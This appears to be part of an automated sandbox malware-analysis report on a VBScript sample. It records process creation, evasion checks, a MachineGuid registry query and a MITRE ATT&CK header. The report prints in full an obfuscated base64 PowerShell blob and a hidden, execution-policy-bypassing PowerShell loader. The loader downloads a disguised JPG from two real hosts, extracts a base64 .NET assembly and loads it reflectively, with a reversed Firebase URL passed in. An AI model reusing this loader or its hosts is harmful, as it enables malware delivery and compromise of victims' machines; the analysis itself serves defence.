Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep count: 3193 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep count: 5713 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2716	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 00000000.00000003.2005623172.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: powershell.exe, 00000004.00000002.2292131893.0000027B03201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hgfS{
Source: wscript.exe, 00000000.00000003.2005823272.000001BA6C3CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006755445.000001BA6C3CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@HBl
Source: wscript.exe, 00000000.00000003.2005623172.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.84.67 443

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'Name','AddInProcess32',''))} }			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtrededgtrelwdgtre5dgtredudgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtrededgtrendgtredgtrezdgtredydgtrenwdgtrezdgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreagbwdgtregcdgtrejwdgtrepdgtredsdgtreidgtredgtrekdgtregkdgtrebqbhdgtregcdgt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'c:\programdata\' , 'name','addinprocess32',''))} }
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtrededgtrelwdgtre5dgtredudgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtrededgtrendgtredgtrezdgtredydgtrenwdgtrezdgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreagbwdgtregcdgtrejwdgtrepdgtredsdgtreidgtredgtrekdgtregkdgtrebqbhdgtregcdgt	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'c:\programdata\' , 'name','addinprocess32',''))} }	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
